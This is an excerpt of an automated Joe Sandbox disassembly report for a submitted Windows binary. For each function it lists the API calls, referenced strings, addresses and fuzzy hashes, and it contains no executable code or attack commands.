@U=u, xrefs: 00B6AA10

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID: @U=u
API String ID: 2777139624-2594219639
Opcode ID: 550e2ade845b329b30df20266ccf821b81819e7224883e018add34537f3bde77
Instruction ID: 72b14dbb7511427ee35a956ac3ef2415f25e9b8991b7ac5fe0f9386abe47c69e
Opcode Fuzzy Hash: 550e2ade845b329b30df20266ccf821b81819e7224883e018add34537f3bde77
Instruction Fuzzy Hash: 3111F3322042056ACF14BEA8DDD29BE7BE99F49700F1010FAF906EB193DD299985CA52

Function 00B96865 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B755FD: GetLocalTime.KERNEL32 ref: 00B7560A
Part of subcall function 00B755FD: _wcsncpy.LIBCMT ref: 00B7563F
Part of subcall function 00B755FD: _wcsncpy.LIBCMT ref: 00B75671
Part of subcall function 00B755FD: _wcsncpy.LIBCMT ref: 00B756A4
Part of subcall function 00B755FD: _wcsncpy.LIBCMT ref: 00B756E6

SendMessageW.USER32(?,00001002,00000000,?), ref: 00B968FF

Strings

SysDateTimePick32, xrefs: 00B968BD
@U=u, xrefs: 00B968FF

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _wcsncpy$LocalMessageSendTime
String ID: @U=u$SysDateTimePick32
API String ID: 2466184910-2530228043
Opcode ID: bdc0c653cda111f20331527e8f58d52f9a44bc6b380d2d544df795d67aeb1405
Instruction ID: 4b415f5c9824eba80d47d02eb80d004d73192846a8dfe7a0c0c41d24d6fbf0ef
Opcode Fuzzy Hash: bdc0c653cda111f20331527e8f58d52f9a44bc6b380d2d544df795d67aeb1405
Instruction Fuzzy Hash: 1F2129713402096FEF219E54DC82FEE73E9EB44760F21456AFD50AB1D0DAB1AC918760

Function 00B69225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B6923E

Part of subcall function 00B713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00B71409
Part of subcall function 00B713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B6925A,00000034,?,?,00001004,00000000,00000000), ref: 00B71419
Part of subcall function 00B713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B6925A,00000034,?,?,00001004,00000000,00000000), ref: 00B7142F

Part of subcall function 00B714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B69296,?,?,00000034,00000800,?,00000034), ref: 00B714E6

SendMessageW.USER32(?,00001073,00000000,?), ref: 00B692A5

Part of subcall function 00B71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00B714B1

Strings

@U=u, xrefs: 00B6923E, 00B692A5

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
String ID: @U=u
API String ID: 1045663743-2594219639
Opcode ID: c084dffbdb8ae585c0e0ea4af8fb0b00cc91dfea02a8f5b632b8b3bebe4c81ee
Instruction ID: c99ceb3c6736aaeaf5f4ab8210d9be5d93f95d25dc87b04277c4382113930468
Opcode Fuzzy Hash: c084dffbdb8ae585c0e0ea4af8fb0b00cc91dfea02a8f5b632b8b3bebe4c81ee
Instruction Fuzzy Hash: 63215E31901129BBEF219BA8DC81FDDBBB8FF09320F1041E5F558A7190DA705A54DBA0

Function 00B966D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B96761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B9676C

Strings

Combobox, xrefs: 00B9672E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 0af1dd39e4100ab55a740f716df63b7072c34931b6b5c82978cb2c72765c4f79
Instruction ID: 1f4527be8ff1424531dd66113fc846c3b92d63158a4e530b0de39ff24c1d0a3d
Opcode Fuzzy Hash: 0af1dd39e4100ab55a740f716df63b7072c34931b6b5c82978cb2c72765c4f79
Instruction Fuzzy Hash: 1D11B271200208AFEF218F94DC80EFB37AAEB483A8F114179F91497290D6359C5187A0

Function 00B996F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

@U=u, xrefs: 00B99778, 00B997A1

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: 01018eafd2ea024348b297f07791b6d80b5c4f90eec847556fe41f3b2e1447e8
Instruction ID: 66525227a2bf54f0bb18021bce34d46de5d790422f3654f9ab20a0138b3107e6
Opcode Fuzzy Hash: 01018eafd2ea024348b297f07791b6d80b5c4f90eec847556fe41f3b2e1447e8
Instruction Fuzzy Hash: 61218E31125208BFEF548F98CC81FBA37E4EB05310F4141A9FA16DA1E0DB79AD10DB60

Function 00B96C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00B11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B11D73
Part of subcall function 00B11D35: GetStockObject.GDI32(00000011), ref: 00B11D87
Part of subcall function 00B11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B11D91

GetWindowRect.USER32(00000000,?), ref: 00B96C71
GetSysColor.USER32(00000012), ref: 00B96C8B

Strings

static, xrefs: 00B96C4E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a00227493ff702b499eba61a1cacfbc53a80e3c61fb114e71b2803b3a9142941
Instruction ID: 8512c01a3f18a24ba502dacc5426018ed01e0fd21a1d25d2090fe07679a7c4af
Opcode Fuzzy Hash: a00227493ff702b499eba61a1cacfbc53a80e3c61fb114e71b2803b3a9142941
Instruction Fuzzy Hash: 6021147261020AAFDF04DFA8CD45AFA7BF8FB08314F114669F995D3250EA35E860DB60

Function 00B729AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B72A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B72A41

Strings

0, xrefs: 00B72A18

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 23d49e63b9af8919b8786a5f516ca15a375aeb532caeb8578ba2d17c32b015e9
Instruction ID: f253eed884c1df03941ae3921df1aaa9512be49bc8c0a733bb10baa520114807
Opcode Fuzzy Hash: 23d49e63b9af8919b8786a5f516ca15a375aeb532caeb8578ba2d17c32b015e9
Instruction Fuzzy Hash: FE11B232D01114ABDF34DB99DC44BAAB7F8EB45310F1580A2E96DE7290E770AD0ACB91

Function 00B821D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B8222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B82255

Strings

<local>, xrefs: 00B8221D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: fe919f326884dca7ba541a94bffd4175cd662a5e38460468aa947fcd96fd3cc7
Instruction ID: 98d9bda6cdb0bbe10bba45da05bb78984d9e3bdb0305fa2118970abc78c07bb1
Opcode Fuzzy Hash: fe919f326884dca7ba541a94bffd4175cd662a5e38460468aa947fcd96fd3cc7
Instruction Fuzzy Hash: 8411A0B0541226BADB25AF518CC8EBBFBE8FF16761F1082AAF91596020D6705D90D7F0

Function 00B984E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 00B98530

Strings

@U=u, xrefs: 00B98530, 00B9856C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 1f1454f1cdb24c26eaf321990b7a0685d8ad52cbdbc59502aea07bc40788fc3c
Instruction ID: efc18cf976141f5a8a504ac21d2ac1fbabfa05ea0736388dabab689570ae68c5
Opcode Fuzzy Hash: 1f1454f1cdb24c26eaf321990b7a0685d8ad52cbdbc59502aea07bc40788fc3c
Instruction Fuzzy Hash: 9821C47560020AEFCF15DF94D8808EA7BF5FB5D350B0141A5FD06A7360DA31AD65DB90

Function 00B965B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 00B9662C

Strings

button, xrefs: 00B96603
@U=u, xrefs: 00B9662C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$button
API String ID: 3850602802-1762282863
Opcode ID: e2b5f4c3d872d74a91d971124fde7e9b07aab8c9ba521d147a2a1b4e5ea8a3b7
Instruction ID: 28c9b62d200fed755bf6043c2f753c8cba475c2c11fa91ca1b3209e12a3982e0
Opcode Fuzzy Hash: e2b5f4c3d872d74a91d971124fde7e9b07aab8c9ba521d147a2a1b4e5ea8a3b7
Instruction Fuzzy Hash: 4D11E172250209ABDF118F60CC51FEA37AAFF18314F114668FA51A7190C776EC61EB20

Function 00B9788C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133E,00000000,?), ref: 00B978D8

Strings

@U=u, xrefs: 00B978D8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: dc56642dc593d1f3baa07bd68a1b36eb13db0b0197054220e20d95ae1fd4b209
Instruction ID: 941d0e456e89a6a0f7ef1f05facc81da80521300e560d9db31f81bd482002607
Opcode Fuzzy Hash: dc56642dc593d1f3baa07bd68a1b36eb13db0b0197054220e20d95ae1fd4b209
Instruction Fuzzy Hash: DB11D030504744AFDB20CF34C891AE7BBE9FF06310F1085ADE8AA87291DB716941DBA0

Function 00B694A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B69296,?,?,00000034,00000800,?,00000034), ref: 00B714E6

SendMessageW.USER32(?,0000102B,?,00000000), ref: 00B69509
SendMessageW.USER32(?,0000102B,?,00000000), ref: 00B6952E

Strings

@U=u, xrefs: 00B69509, 00B6952E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$MemoryProcessWrite
String ID: @U=u
API String ID: 1195347164-2594219639
Opcode ID: 4d8ee056a07e253972ed58ec54f971bf941f01106d12cf164ee7182cfc4bb7a6
Instruction ID: 520a9f59d647752f3e1ba3b4f0833a19bd11de5b18d48f390f862fbd45d9350e
Opcode Fuzzy Hash: 4d8ee056a07e253972ed58ec54f971bf941f01106d12cf164ee7182cfc4bb7a6
Instruction Fuzzy Hash: B601F231500219EBEB21AF58DC45EEEB7BCDB14320F1041AAF919A71D1DB746D55CB60

Function 00B695D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00B695FB
SendMessageW.USER32(?,0000040D,?,00000000), ref: 00B6962E

Part of subcall function 00B71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00B714B1

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

Strings

@U=u, xrefs: 00B695FB, 00B6962E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$MemoryProcessRead_memmove
String ID: @U=u
API String ID: 339422723-2594219639
Opcode ID: da64e291ddefd84956bc388fb459a1482a0d95df32c67e2b34c907770e8fce58
Instruction ID: ab32f261e565298bf006a66add28408353512ddd419fef22522c503ce9691404
Opcode Fuzzy Hash: da64e291ddefd84956bc388fb459a1482a0d95df32c67e2b34c907770e8fce58
Instruction Fuzzy Hash: 17016D71800218AFDB50AF54DC81EEA77BCFB18340F80C0AAF649A7150DE311E99CF90

Function 00B9C57D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00B4B93A,?,?,?), ref: 00B9C5F1

Part of subcall function 00B125DB: GetWindowLongW.USER32(?,000000EB), ref: 00B125EC

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00B9C5D7

Strings

@U=u, xrefs: 00B9C5D7

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: @U=u
API String ID: 982171247-2594219639
Opcode ID: 256ea4ef9c728bc25cbe415bd1efcd492e9967266015c54800818bef90e6097e
Instruction ID: 06b2ee2adeed2ba9a2ff2ecc980b74ebc8e2ff8dc4caac5896122e6e4537a6f2
Opcode Fuzzy Hash: 256ea4ef9c728bc25cbe415bd1efcd492e9967266015c54800818bef90e6097e
Instruction Fuzzy Hash: 1901B131201204ABCF215F14DC95F6A7FE6FBA5360F2501A9F9415B2E0CB32AC51EBA0

Function 00B6953C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B6954C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B69564

Strings

@U=u, xrefs: 00B6954C, 00B69564

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: ed0e6065cb6d703ffdc68a5fce4be293c66854b0727162e6e76ef77f3f68b3e5
Instruction ID: e4266904942ce1f669f09c9899bf3f6c534ee7aa498f2506cdd192c8804eee88
Opcode Fuzzy Hash: ed0e6065cb6d703ffdc68a5fce4be293c66854b0727162e6e76ef77f3f68b3e5
Instruction Fuzzy Hash: 77E02B3534232276F23116268D8AFD72E8DDB98B71F100035B702DA1D5CDE20D5282B0

Function 00B74F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B74F46
_wcscmp.LIBCMT ref: 00B74F58

Strings

#32770, xrefs: 00B74F52

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 86db7b42a4d133b91186f45c5dcc64c1f6ffd931a05f8727af842d88dd6a6b72
Instruction ID: f32a7a2a90f00e096b12a84e6ada0d84e1b50c0a2a50bb9dfb2573dbf4899bca
Opcode Fuzzy Hash: 86db7b42a4d133b91186f45c5dcc64c1f6ffd931a05f8727af842d88dd6a6b72
Instruction Fuzzy Hash: 99E0D832A0022D2BD7209B99AC4AFB7F7ECEB55B71F0100ABFD04D7051EA609A5587E1

Function 00B4B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B4B314: _memset.LIBCMT ref: 00B4B321

Part of subcall function 00B30940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B4B2F0,?,?,?,00B1100A), ref: 00B30945

IsDebuggerPresent.KERNEL32(?,?,?,00B1100A), ref: 00B4B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B1100A), ref: 00B4B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B4B2FE

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: e1695b223073ffb1a7d90a3cafc959d4c3a96830b0cca38ef018c50a1f4f72e2
Instruction ID: 8f4b9b62eee9d76c104a9d30853abacfbb40ff28681335f53858d0704e276580
Opcode Fuzzy Hash: e1695b223073ffb1a7d90a3cafc959d4c3a96830b0cca38ef018c50a1f4f72e2
Instruction Fuzzy Hash: 21E092702007118FD720EF2AE5047A67BE4EF04354F008AADE546C7250EBF4D544CBA1

Function 00B51935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00B51775

Part of subcall function 00B8BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00B5195E,?), ref: 00B8BFFE
Part of subcall function 00B8BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B8C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B5196D

Strings

WIN_XPe, xrefs: 00B51788

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

